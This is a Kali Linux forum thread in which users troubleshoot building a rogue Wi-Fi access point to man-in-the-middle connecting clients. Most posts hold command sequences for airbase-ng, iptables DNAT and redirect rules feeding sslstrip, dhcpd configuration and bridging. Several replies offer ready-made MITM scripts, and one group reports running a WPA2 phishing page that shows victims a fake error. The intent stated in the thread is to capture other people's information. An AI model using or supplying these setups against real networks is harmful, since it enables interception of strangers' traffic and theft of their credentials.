Results 1 to 20 of 20

Thread: isc-dhcp-server to make a rouge ap to mitm with no script

  1. #1
    Join Date
    2013-May
    Posts
    5

    Question isc-dhcp-server to make a rouge ap to mitm with no script

    hi im running kali on amd64 hdd install gnome with 2 wireless cards wlan0 and wlan1 and i want to make a rouge ap to have clients connect and i will have sslstrip and other tools collecting info i have been trying to setup a rouge ap with isc-dhcp-server and airbase-ng i have tried a few things and have been able to get clients ips but they dont recive internet (wlan0 is connected to internet and wlan1 will have the ap on it)

    so here is the ifconfig

    eth0 Link encap:Ethernet HWaddr 10:1f:74:0f:f1:cf
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:32 errors:0 dropped:0 overruns:0 frame:0
    TX packets:32 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:1920 (1.8 KiB) TX bytes:1920 (1.8 KiB)

    wlan0 Link encap:Ethernet HWaddr 38:59:f9:75:e3:ce
    inet addr:192.168.1.102 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::3a59:f9ff:fe75:e3ce/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7079 errors:0 dropped:0 overruns:0 frame:0
    TX packets:2346 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:2604757 (2.4 MiB) TX bytes:429234 (419.1 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:6c:a1:b3
    inet addr:192.168.1.103 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::2c0:caff:fe6c:a1b3/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:4741 errors:0 dropped:0 overruns:0 frame:0
    TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:622681 (608.0 KiB) TX bytes:1411 (1.3 KiB)

    so i do these comands

    airmon-ng start wlan1 1
    airbase-ng -e rougeap -c 1 mon0
    ifconfig at0 up
    ifconfig at0 192.168.1.1 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80
    iptables -t nat -A POSTROUTING -j MASQUERADE
    dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
    echo "1" > /proc/sys/net/ipv4/ip_forward

    my /etc/dhcp/dhcp.conf is setup as so

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.255;
    range 192.168.1.100 192.168.1.254;
    }

    what am i doing wrong?

  2. #2
    Join Date
    2013-Apr
    Posts
    126
    try these rules:
    Code:
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.102
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

  3. #3
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Having both wlan0 and wlan1 on the same subnet could cause problems: try them on different eg 10.1.1.0 for your rogue AP.

    What are you trying to do with this line:
    "iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.102:80"?

  4. #4
    Join Date
    2013-May
    Posts
    5
    hey vulpi i love your pwnstar script is there any way you can show me how you set the server up ive tried to go through your script to do it just like you but im really bad at programing

  5. #5
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    If your victims are getting ip addresses then your dhcp server is working. The problem is in the routing. You need 2 separate subnets. Remove the iptables line mentioned above. "option routers 192.168.1.255;" should be pointing to your fake ap, not to your home router.

    Clear the dns cache in your victims, or browse to random nonsense addresses to avoid dns-cacheing. Don't introduce sslstrip until it's working without it.

    I know its frustrating but you'll learn more continuing to try it manually, rather than blindly running scripts.

  6. #6
    Join Date
    2013-May
    Posts
    5
    now i have it setup like this

    airmon-ng wlan0 1
    airbase-ng -e rougeap -c 1 mon0
    ifconfig at0 up
    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.102
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    dhcpd -d -f -cf /etc/dhcp/dhcpd.conf at0
    echo "1" > /proc/sys/net/ipv4/ip_forward

    so ifconfig looks like this

    at0 Link encap:Ethernet HWaddr 00:12:23:34:45:56
    inet addr:10.1.1.0 Bcast:10.1.1.255 Mask:255.255.255.0
    inet6 addr: fe80::212:23ff:fe34:4556/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:460 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:500
    RX bytes:95690 (93.4 KiB) TX bytes:468 (468.0 B)

    eth0 Link encap:Ethernet HWaddr 10:1f:74:0f:f1:cf
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:65536 Metric:1
    RX packets:282 errors:0 dropped:0 overruns:0 frame:0
    TX packets:282 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:89557 (87.4 KiB) TX bytes:89557 (87.4 KiB)

    mon0 Link encap:UNSPEC HWaddr 00-C0-CA-6C-A1-B3-3A-30-00-00-00-00-00-00-00-00
    UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1800 Metric:1
    RX packets:3266 errors:0 dropped:20 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:495766 (484.1 KiB) TX bytes:0 (0.0 B)

    mon1 Link encap:UNSPEC HWaddr 00-C0-CA-6C-A1-B3-00-00-00-00-00-00-00-00-00-00
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:161 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:21502 (20.9 KiB) TX bytes:0 (0.0 B)

    wlan0 Link encap:Ethernet HWaddr 38:59:f9:75:e3:ce
    inet addr:192.168.1.100 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::3a59:f9ff:fe75:e3ce/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7384 errors:0 dropped:0 overruns:0 frame:0
    TX packets:4947 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:9772691 (9.3 MiB) TX bytes:569542 (556.1 KiB)

    wlan1 Link encap:Ethernet HWaddr 00:c0:ca:6c:a1:b3
    inet6 addr: fe80::2c0:caff:fe6c:a1b3/64 Scope:Link
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:45 errors:0 dropped:0 overruns:0 frame:0
    TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:7740 (7.5 KiB) TX bytes:1220 (1.1 KiB)

    and the dhcpd.conf looks like this

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 10.1.1.0;
    range 192.168.1.100 192.168.1.254;
    }

  7. #7
    Join Date
    2013-May
    Posts
    5
    but i get this message

    Wrote 0 leases to leases file.

    No subnet declaration for at0 (10.1.1.0).
    ** Ignoring requests on at0. If this is not what
    you want, please write a subnet declaration
    in your dhcpd.conf file for the network segment
    to which interface at0 is attached. **


    Not configured to listen on any interfaces!

  8. #8
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    I'm afraid you're still getting your home and fake-AP subnets mixed together. Perhaps sketch them out on paper first.

    "ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0"

    "No subnet declaration for at0 (10.1.1.0)"
    "subnet 192.168.1.0 netmask 255.255.255.0 {"

    "please write a subnet declaration
    in your dhcpd.conf file for the network segment
    to which interface at0 is attached
    "

  9. #9
    Join Date
    2013-May
    Posts
    5
    so should it be

    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0

    ifconfig at0 10.1.1.0 netmask 255.255.255.0
    route add -net 10.1.1.0 netmask 255.255.255.0 gw 192.168.1.0

    ifconfig at0 192.168.1.0 netmask 255.255.255.0
    route add -net 192.168.1.0 netmask 255.255.255.0 gw 10.1.1.0

    ifconfig at0 192.168.1.0 netmask 255.255.255.0
    route add -net 10.1.1.0 netmask 255.255.255.0 gw 192.168.1.0

    and my dhcpd.conf is setup as so

    ddns-update-style interim;
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.1.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option domain-name-servers 8.8.8.8;
    option routers 10.1.1.0;
    range 10.1.1.100 10.1.1.254;
    }

  10. #10
    Join Date
    2013-Jul
    Posts
    1
    I also got a lot of errors while using dhcpd .. therefore i switched to dnsmasq it works great .. You should check it out here http://www.techgeektricks.blogspot.i...-honeypot.html

  11. #11
    Join Date
    2013-Apr
    Posts
    1
    http://code.google.com/p/quickset/

    Take that and run with it. I probably need to update the dhcpd type syntax within it due to a change that took place from backtrack to kali, but the end result is the same

    Enjoy.

  12. #12
    Join Date
    2013-Jul
    Posts
    841
    The Musket Team has been running a Phishing program from techdynamics on BT5R3 see ***REMOVED LINK****. We tried moving this program to Kali. We have been unable to run it thru the isc-dhcp-server however we easily got it to run thru dnsmasq . We are working on the isc-dhcpd-server problem but are running into the same wall as others on this forum in that we cannot get it to pass thru and show the fake ap page. We will probably rip kali out and reinstall and see if we can get dnsmasq up and running on a dual boot HD install.
    Concerning a dnsmasq install. We were only able to install dnsmasq(ie apt-get install dnsmasq) on a persistent usb running kali which had been updated but not upgraded. We will publish the complete script rewrite and install instructions as soon as we clean up the scriipt file and instructions prior to running.

    Our mistake is that the dnsmasq is already installed in kali. We simply did not find it in the normal places and there was no config file in the /etc/ folder. However if you type dnsmasq in a terminal windo the program activates and a help file is available.
    We had to write a config file and save it in the /etc/dnsmasq.conf. We started dnsmasq in the phishing program with dnsmasq -C /etc/dnsmaq.conf and the program worked perfectly. It provided the fake WPA error page and then passed the client on to the internet seamlessly. Actually better then our BT5R3 solution. We used two(2) wifi recievers one(1) in mon0 mode and another connected to the internet. We will publish the rewrite of the techdynamic approach applied to Kali soon.
    I would not waste time with the isc-dhcpd-server file. It obviously works well with Network Manager but for phishing purposes here it is not worth the effort
    Last edited by g0tmi1k; 2013-08-02 at 14:36. Reason: Youtube Rule

  13. #13
    Join Date
    2013-Aug
    Posts
    2
    Wow, what a great thread, I've been having these issues as well, with my fake AP being broadcasted but only limited connectivity. I know it has to be with the routing and having my fake AP assign an IP address. Also Do I have to be connected to the internet intitially or can I give my fake AP internet access from not being connected to the internet myself. Would also like to know if I can just assign any IP addresses to clients through my fake AP? Still looking at this pwnstar script to try and figure out how you got the DHCP server running. Any guides on where the Ip's are going in the script would be helpful, as you said before, I really want to learn this manually and understand whats going on behind the scenes instead of running a script, I would like to create my own scripts at some point as well.

  14. #14
    Join Date
    2013-Jun
    Posts
    45
    # ifconfig (wifi-bridge) up ???
    I dont see your wifi bridge in the ifconfig command...
    maybe..

  15. #15
    Join Date
    2013-Aug
    Posts
    25
    try network sniffer in my script ...

  16. #16
    Join Date
    2013-Aug
    Posts
    1
    Hi, I don't want to stop you trying to build this yourself but to save you some time its already been done. I helped write a script back in BT4 that did just this, it was only last night that i pulled it back out and made some amends, the code is linked here:

    http://pastebin.com/GQKRzKDy

    Copy the whole script into a file (airssl.sh) and then make it executable and run it, it will walk you through everything you need to do to create a fake AP, then route that traffic out to your gateway leaving you MITM running SSL-Strip on the connection.

  17. #17
    Join Date
    2013-Jun
    Posts
    45
    This is a common easy way to set a rogue acces point to do a mitm attack. the last step is very important and many times forgotten. Bring the bridge up with ifconfig. if you do so you should also be able to see the bridge when running ifconfig. # brctl show will enable you to show all available bridges and its interfaces connected to it.
    this way you don't need script. Any client connected to the rogue acces point should have an internet connection and the ability to use it.


    # airbase-ng --essid rogue -c (channel) -a (bssid) mon0 ==> for open authentication or [-W 1 (for wep)/ -W 1 -z 2 (for wpa)/ -W 1 -Z 2 (for wpa2)]
    # brctl addbr (wifi-bridge)
    # brctl addif (wifi-bridge) eth0
    # brctl addif (wifi-bridge) ar0
    # ifconfig at0 0.0.0.0 up
    # ifconfig eth0 0.0.0.0 up
    # echo 1 > /proc/sys/net/ipv4/ip_forward
    # ifconfig (wifi-bridge) up

  18. #18
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Still looking at this pwnstar script to try and figure out how you got the DHCP server running. Any guides on where the Ip's are going in the script would be helpful
    If you have any specific queries, post in the PwnSTAR thread (http://forums.kali.org/showthread.ph...unning-on-Kali) and I'll try to answer them.

  19. #19
    Join Date
    2013-Jul
    Posts
    841
    The musket team posted the download address for a WPA2 Phishing script. See Kali forums or aircrack-ng forums-programing- (WPA Enterprise WPA2 phishing). The program works but not as well as we would like so we are continuing to improve it

    We just completed install procedures on weakerthen4.2 and will publish install instructions as soon as we clean it up a bit.

    Concerning comments in this blog

    1. Vaxel the pastebin address http://pastebin.com/GQKRzKDy doesnot exist. We would like to see your work. If you can show differences between the two different servers in Ubuntu versus kali that would be helful.

    2. The bridging commands brctl are not part of Kali-linux. We went everywhere trying to find a download. Nothing worked. So we just played around with download names in apt-get and got a hit. This does work from bridge-utils_1.5-6_i386.deb. Type

    apt-get install bridge-utils

    We have made a bridge etc so the commands do work. Now we have to learn how to use them as just installed and we are unsure where this will go. You can google the command list easily. With the command list the comments from leevai will make sense.

  20. #20
    Join Date
    2013-Jul
    Posts
    841
    Some Bridge Commands

    addbr <bridge> add bridge
    addif <bridge> <device> add interface to bridge
    delbr <bridge> delete bridge
    delif <bridge> <device> delete interface from bridge
    show show a list of bridges
    showbr <bridge> show bridge info
    showmacs <bridge> show a list of mac addrs

    setageing <bridge> <time> set ageing time
    setbridgeprio <bridge> <prio> set bridge priority
    setfd <bridge> <time> set bridge forward delay
    setgcint <bridge> <time> set garbage collection interval (11)
    sethello <bridge> <time> set hello time (12)
    setmaxage <bridge> <time> set max message age (13)
    setpathcost <bridge> <port> <cost> set path cost (14)
    setportprio <bridge> <port> <prio> set port priority (15)
    stp <bridge> <state> {dis,en}able stp (16)

Similar Threads

  1. Toubleshooting DHCP server
    By Vrushali in forum TroubleShooting Archive
    Replies: 2
    Last Post: 2016-03-03, 04:10
  2. working Mitm automated script
    By scorpoin in forum General Archive
    Replies: 2
    Last Post: 2014-06-26, 00:51
  3. Yamas : a mitm sniffing script for lan.
    By comaX in forum How-To Archive
    Replies: 34
    Last Post: 2014-01-17, 19:08

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •